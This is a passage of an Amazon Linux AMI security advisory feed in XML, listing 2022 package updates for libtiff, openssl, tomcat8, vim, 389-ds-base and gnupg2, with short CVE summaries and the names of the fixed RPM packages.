arch="i686"><filename>Packages/kernel-tools-devel-4.14.287-148.504.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.287" release="148.504.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.287-148.504.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.287" release="148.504.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.287-148.504.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.287" release="148.504.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.287-148.504.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.287" release="148.504.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.287-148.504.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1625</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1625: medium priority package update for libtiff</title><issued date="2022-07-28 20:38:00" /><updated date="2022-08-04 22:54:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-22844:
A buffer overflow vulnerability was found in libtiff. This flaw allows an attacker with network access to pass specially crafted files, causing an application to halt or crash. The root cause of this issue was from the memcpy function in tif_unix.c.
CVE-2022-0924:
A heap buffer overflow flaw was found in Libtiffs' cpContigBufToSeparateBuf() function of the tiffcp.c file. This flaw allows an attacker with a crafted TIFF file to trigger a heap out-of-bounds read access issue, causing a crash that leads to a denial of service.
CVE-2022-0909:
A floating-point exception (FPE) flaw was found in LibTIFF's computeOutputPixelOffsets() function in tiffcrop.c file. This flaw allows an attacker with a crafted TIFF file to trigger a divide-by-zero error, causing a crash that leads to a denial of service.
CVE-2022-0908:
A flaw was found in LibTIFF where a NULL source pointer passed as an argument to the memcpy() function within the TIFFFetchNormalTag() in tif_dirread.c. This flaw allows an attacker with a crafted TIFF file to cause a crash that leads to a denial of service.
CVE-2022-0907:
A NULL pointer dereference flaw was found in Libtiff. This flaw allows an attacker with a crafted TIFF file to cause a crash that leads to a denial of service.
CVE-2022-0865:
A reachable assertion failure was found in libtiff's JBIG functionality. This flaw allows an attacker who can submit a crafted file to an application linked with libtiff and using the JBIG functionality, causes a crash via an assertion failure, leading to a denial of service. The exact mechanism and conditions around this issue are dependent on how the application uses libtiff.
CVE-2022-0562:
A flaw was found in libtiff where a NULL source pointer passed as an argument to the memcpy() function within the TIFFReadDirectory() in tif_dirread.c. This flaw allows an attacker to exploit this vulnerability via a crafted TIFF file, causing a crash and leading to a denial of service.
CVE-2022-0561:
A flaw was found in libtiff where a NULL source pointer passed as an argument to the memcpy() function within the TIFFFetchStripThing() in tif_dirread.c. This flaw allows an attacker with a crafted TIFF file to exploit this flaw, causing a crash and leading to a denial of service.
CVE-2020-35524:
A heap-based buffer overflow flaw was found in libtiff in the handling of TIFF images in libtiff's TIFF2PDF tool. A specially crafted TIFF file can lead to arbitrary code execution. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
CVE-2020-35523:
An integer overflow flaw was found in libtiff that exists in the tif_getimage.c file. This flaw allows an attacker to inject and execute arbitrary code when a user opens a crafted TIFF file. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
CVE-2020-35522:
In LibTIFF, there is a memory malloc failure in tif_pixarlog.c. A crafted TIFF document can lead to an abort, resulting in a remote denial of service attack.
CVE-2020-35521:
A flaw was found in libtiff. Due to a memory allocation failure in tif_read.c, a crafted TIFF file can lead to an abort, resulting in denial of service.
CVE-2016-9532:
Integer overflow in the writeBufferToSeparateStrips function in tiffcrop.c in LibTIFF before 4.0.7 allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted tif file.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9532" title="" id="CVE-2016-9532" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35521" title="" id="CVE-2020-35521" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35522" title="" id="CVE-2020-35522" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35523" title="" id="CVE-2020-35523" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35524" title="" id="CVE-2020-35524" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0561" title="" id="CVE-2022-0561" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0562" title="" id="CVE-2022-0562" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0865" title="" id="CVE-2022-0865" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0907" title="" id="CVE-2022-0907" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0908" title="" id="CVE-2022-0908" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0909" title="" id="CVE-2022-0909" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0924" title="" id="CVE-2022-0924" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22844" title="" id="CVE-2022-22844" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtiff" version="4.0.3" release="35.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-4.0.3-35.38.amzn1.x86_64.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-static-4.0.3-35.38.amzn1.x86_64.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-4.0.3-35.38.amzn1.x86_64.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="35.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-devel-4.0.3-35.38.amzn1.x86_64.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.38.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-debuginfo-4.0.3-35.38.amzn1.i686.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.38.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-4.0.3-35.38.amzn1.i686.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="35.38.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-4.0.3-35.38.amzn1.i686.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.38.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-static-4.0.3-35.38.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1626</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1626: medium priority package update for openssl</title><issued date="2022-07-28 20:38:00" /><updated date="2022-08-04 22:55:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-2068:
A flaw was found in OpenSSL. The issue in CVE-2022-1292 did not find other places in the `c_rehash` script where it possibly passed the file names of certificates being hashed to a command executed through the shell. Some operating systems distribute this script in a manner where it is automatically executed. On these operating systems, this flaw allows an attacker to execute arbitrary commands with the privileges of the script.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068" title="" id="CVE-2022-2068" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-perl" version="1.0.2k" release="16.159.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.2k-16.159.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.159.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.2k-16.159.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.159.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.2k-16.159.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.159.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.2k-16.159.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.159.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.2k-16.159.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.159.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.2k-16.159.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.159.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.2k-16.159.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.159.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.2k-16.159.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.159.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.2k-16.159.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.159.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.2k-16.159.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1627</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1627: important priority package update for tomcat8</title><issued date="2022-07-28 20:39:00" /><updated date="2022-08-04 22:58:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-29885:
The documentation of Apache Tomcat 10.1.0-M1 to 10.1.0-M14, 10.0.0-M1 to 10.0.20, 9.0.13 to 9.0.62 and 8.5.38 to 8.5.78 for the EncryptInterceptor incorrectly stated it enabled Tomcat clustering to run over an untrusted network. This was not correct. While the EncryptInterceptor does provide confidentiality and integrity protection, it does not protect against all risks associated with running over any untrusted network, particularly DoS risks.
CVE-2022-25762:
A flaw was found in the tomcat package. When a web application sends a WebSocket message concurrently with the WebSocket connection closing, the application may continue to use the socket after it has been closed. In this case, the error handling triggered could cause the pooled object to be placed in the pool twice. This issue results in subsequent connections using the same object concurrently, which causes data to be potentially returned to the wrong user or application stability issues.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25762" title="" id="CVE-2022-25762" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29885" title="" id="CVE-2022-29885" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-jsp-2.3-api" version="8.5.81" release="1.91.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.81-1.91.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.5.81" release="1.91.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.81-1.91.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.81" release="1.91.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.81-1.91.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.81" release="1.91.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.81-1.91.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.81" release="1.91.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.81-1.91.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.81" release="1.91.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.81-1.91.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.5.81" release="1.91.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.81-1.91.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.81" release="1.91.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.81-1.91.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.81" release="1.91.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.81-1.91.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.5.81" release="1.91.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.81-1.91.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1628</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1628: medium priority package update for vim</title><issued date="2022-07-28 20:41:00" /><updated date="2022-08-04 23:02:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-2231:
NULL Pointer Dereference in GitHub repository vim/vim prior to 8.2.
CVE-2022-2210:
Out-of-bounds Write in GitHub repository vim/vim prior to 8.2.
CVE-2022-2208:
NULL Pointer Dereference in GitHub repository vim/vim prior to 8.2.5163.
CVE-2022-2207:
Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.
CVE-2022-2206:
Out-of-bounds Read in GitHub repository vim/vim prior to 8.2.
CVE-2022-2183:
Out-of-bounds Read in GitHub repository vim/vim prior to 8.2.
CVE-2022-2182:
Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.
CVE-2022-2175:
A heap buffer over-read vulnerability was found in Vim's put_on_cmdline() function of the src/ex_getln.c file. This issue occurs due to invalid memory access when using an expression on the command line. This flaw allows an attacker to trick a user into opening a specially crafted file, triggering a heap buffer overflow that causes an application to crash and corrupt memory.
CVE-2022-2129:
Out-of-bounds Write in GitHub repository vim/vim prior to 8.2.
CVE-2022-2126:
Out-of-bounds Read in GitHub repository vim/vim prior to 8.2.
CVE-2022-2125:
Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.
CVE-2022-2124:
Buffer Over-read in GitHub repository vim/vim prior to 8.2.
CVE-2022-2042:
A heap use-after-free vulnerability was found in Vim's skipwhite() function of the src/charset.c file. This flaw occurs because of an uninitialized attribute value and freed memory in the spell command. This flaw allows an attacker to trick a user into opening a specially crafted file, triggering a heap use-after-free that causes an application to crash and corrupt memory.
CVE-2022-2000:
An out-of-bounds write vulnerability was found in Vim's append_command() function of the src/ex_docmd.c file. This issue occurs when an error for a command goes over the end of IObuff. This flaw allows an attacker to trick a user into opening a specially crafted file, triggering a heap buffer overflow that causes an application to crash and corrupt memory.
CVE-2022-1968:
A flaw was found in vim. The vulnerability occurs due to Illegal memory access and leads to a use-after-free vulnerability in the utf_ptr2char function. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-1942:
An out-of-bounds write vulnerability was found in Vim's vim_regsub_both() function in the src/regexp.c file. The flaw can open a command-line window from a substitute expression when a text or buffer is locked. This flaw allows an attacker to trick a user into opening a specially crafted file, triggering an out-of-bounds write that causes an application to crash, possibly reading and modifying some amount of memory contents.
CVE-2022-1927:
A flaw was found in vim. The vulnerability occurs due to Illegal memory access and leads to a buffer over-read vulnerability in the utf_ptr2char function. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-1898:
A flaw was found in vim. The vulnerability occurs due to Illegal memory access and leads to a use-after-free vulnerability in the find_pattern_in_path function. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-1897:
A flaw was found in vim. The vulnerability occurs due to Illegal memory access and leads to an out-of-bounds write vulnerability in the vim_regsub_both function. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-1886:
A heap buffer overflow flaw was found in Vim's utf_head_off() function in the mbyte.c file. This flaw allows an attacker to trick a user into opening a specially crafted file, triggering a heap buffer overflow that causes an application to crash, leading to a denial of service and possibly some amount of memory leak.
CVE-2022-1851:
A flaw was found in vim. The vulnerability occurs due to Illegal memory access and leads to an out-of-bounds read vulnerability in the gchar_cursor function. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-1796:
A flaw was found in vim. The vulnerability occurs due to Illegal memory access and leads to a use after free vulnerability. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-1785:
A flaw was found in vim. The vulnerability occurs due to Illegal memory access and leads to an out-of-bounds write vulnerability in the ex_cmds function. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-1771:
A flaw was found in vim. The vulnerability occurs due to Illegal memory access and leads to a stack-based buffer overflow vulnerability. This flaw allows an attacker to input a specially crafted file, leading to a crash or code execution.
CVE-2022-1769:
Buffer Over-read in GitHub repository vim/vim prior to 8.2.4974.
CVE-2022-1735:
Classic Buffer Overflow in GitHub repository vim/vim prior to 8.2.4969.
CVE-2022-1733:
Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.4968.
CVE-2022-1725:
NULL Pointer Dereference in GitHub repository vim/vim prior to 8.2.495
CVE-2022-1720:
A heap buffer over-read vulnerability was found in Vim's grab_file_name() function of the src/findfile.c file. This flaw occurs because the function reads after the NULL terminates the line with "gf" in Visual block mode. This flaw allows an attacker to trick a user into opening a specially crafted file, triggering a heap buffer over-read vulnerability that causes an application to crash and corrupt memory.
CVE-2022-1674:
A NULL pointer dereference flaw was found in vim's vim_regexec_string() function in regexp.c file. The issue occurs when the function tries to match the buffer with an invalid pattern. This flaw allows an attacker to trick a user into opening a specially crafted file, triggering a NULL pointer dereference that causes an application to crash, leading to a denial of service.
CVE-2022-1629:
Buffer Over-read in function find_next_quote in GitHub repository vim/vim prior to 8.2.4925. This vulnerabilities are capable of crashing software, Modify Memory, and possible remote execution
CVE-2022-1621:
Heap buffer overflow in vim_strncpy find_word in GitHub repository vim/vim prior to 8.2.4919. This vulnerability is capable of crashing software, Bypass Protection Mechanism, Modify Memory, and possible remote execution
CVE-2022-1620:
NULL Pointer Dereference in function vim_regexec_string at regexp.c:2729 in GitHub repository vim/vim prior to 8.2.4901. NULL Pointer Dereference in function vim_regexec_string at regexp.c:2729 allows attackers to cause a denial of service (application crash) via a crafted input.
CVE-2022-1619:
Heap-based Buffer Overflow in function cmdline_erase_chars in GitHub repository vim/vim prior to 8.2.4899. This vulnerabilities are capable of crashing software, modify memory, and possible remote execution
CVE-2022-1616:
Use after free in append_command in GitHub repository vim/vim prior to 8.2.4895. This vulnerability is capable of crashing software, Bypass Protection Mechanism, Modify Memory, and possible remote execution
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1616" title="" id="CVE-2022-1616" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1619" title="" id="CVE-2022-1619" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1620" title="" id="CVE-2022-1620" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1621" title="" id="CVE-2022-1621" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1629" title="" id="CVE-2022-1629" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1674" title="" id="CVE-2022-1674" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1720" title="" id="CVE-2022-1720" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1725" title="" id="CVE-2022-1725" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1733" title="" id="CVE-2022-1733" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1735" title="" id="CVE-2022-1735" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1769" title="" id="CVE-2022-1769" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1771" title="" id="CVE-2022-1771" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1785" title="" id="CVE-2022-1785" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1796" title="" id="CVE-2022-1796" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1851" title="" id="CVE-2022-1851" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1886" title="" id="CVE-2022-1886" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1897" title="" id="CVE-2022-1897" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1898" title="" id="CVE-2022-1898" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1927" title="" id="CVE-2022-1927" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1942" title="" id="CVE-2022-1942" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1968" title="" id="CVE-2022-1968" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2000" title="" id="CVE-2022-2000" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2042" title="" id="CVE-2022-2042" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2124" title="" id="CVE-2022-2124" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2125" title="" id="CVE-2022-2125" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2126" title="" id="CVE-2022-2126" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2129" title="" id="CVE-2022-2129" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2175" title="" id="CVE-2022-2175" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2182" title="" id="CVE-2022-2182" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2183" title="" id="CVE-2022-2183" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2206" title="" id="CVE-2022-2206" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2207" title="" id="CVE-2022-2207" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2208" title="" id="CVE-2022-2208" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2210" title="" id="CVE-2022-2210" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2231" title="" id="CVE-2022-2231" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="vim-debuginfo" version="8.2.5172" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-debuginfo-8.2.5172-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-filesystem" version="8.2.5172" release="1.1.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-filesystem-8.2.5172-1.1.amzn1.noarch.rpm</filename></package><package name="vim-enhanced" version="8.2.5172" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-enhanced-8.2.5172-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-common" version="8.2.5172" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-common-8.2.5172-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-data" version="8.2.5172" release="1.1.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-data-8.2.5172-1.1.amzn1.noarch.rpm</filename></package><package name="vim-minimal" version="8.2.5172" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-minimal-8.2.5172-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-minimal" version="8.2.5172" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-minimal-8.2.5172-1.1.amzn1.i686.rpm</filename></package><package name="vim-debuginfo" version="8.2.5172" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-debuginfo-8.2.5172-1.1.amzn1.i686.rpm</filename></package><package name="vim-common" version="8.2.5172" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-common-8.2.5172-1.1.amzn1.i686.rpm</filename></package><package name="vim-enhanced" version="8.2.5172" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-enhanced-8.2.5172-1.1.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1629</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1629: low priority package update for 389-ds-base</title><issued date="2022-08-15 18:37:00" /><updated date="2022-08-22 23:58:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-4091:
A double free was found in the way 389-ds-base handles virtual attributes context in persistent searches. An attacker could send a series of search requests, forcing the server to behave unexpectedly, and crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4091" title="" id="CVE-2021-4091" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base-snmp" version="1.3.10.2" release="16.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-snmp-1.3.10.2-16.69.amzn1.x86_64.rpm</filename></package><package name="389-ds-base" version="1.3.10.2" release="16.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.10.2-16.69.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.10.2" release="16.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.10.2-16.69.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-libs" version="1.3.10.2" release="16.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.10.2-16.69.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.10.2" release="16.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.10.2-16.69.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.10.2" release="16.69.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-devel-1.3.10.2-16.69.amzn1.i686.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.10.2" release="16.69.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-snmp-1.3.10.2-16.69.amzn1.i686.rpm</filename></package><package name="389-ds-base-libs" version="1.3.10.2" release="16.69.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-libs-1.3.10.2-16.69.amzn1.i686.rpm</filename></package><package name="389-ds-base" version="1.3.10.2" release="16.69.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-1.3.10.2-16.69.amzn1.i686.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.10.2" release="16.69.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.10.2-16.69.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1630</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1630: medium priority package update for gnupg2</title><issued date="2022-08-15 18:37:00" /><updated date="2022-08-22 23:58:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-34903:
A vulnerability was found in GnuPG. This issue occurs due to an escape detection loop at the write_status_text_and_buffer() function in g10/cpr.c. This flaw allows a malicious actor to bypass access control.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34903" title="" id="CVE-2022-34903" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gnupg2-smime" version="2.0.28" release="2.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg2-smime-2.0.28-2.35.amzn1.x86_64.rpm</filename></package><package name="gnupg2" version="2.0.28" release="2.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg2-2.0.28-2.35.amzn1.x86_64.rpm</filename></package><package name="gnupg2-debuginfo" version="2.0.28" release="2.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg2-debuginfo-2.0.28-2.35.amzn1.x86_64.rpm</filename></package><package name="gnupg2-smime" version="2.0.28" release="2.35.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg2-smime-2.0.28-2.35.amzn1.i686.rpm</filename></package><package name="gnupg2" version="2.0.28" release="2.35.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg2-2.0.28-2.35.amzn1.i686.rpm</filename></package><package name="gnupg2-debuginfo" version="2.0.28" release="2.35.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg2-debuginfo-2.0.28-2.35.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1631</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1631: important priority package update for java-1.8.0-openjdk</title><issued 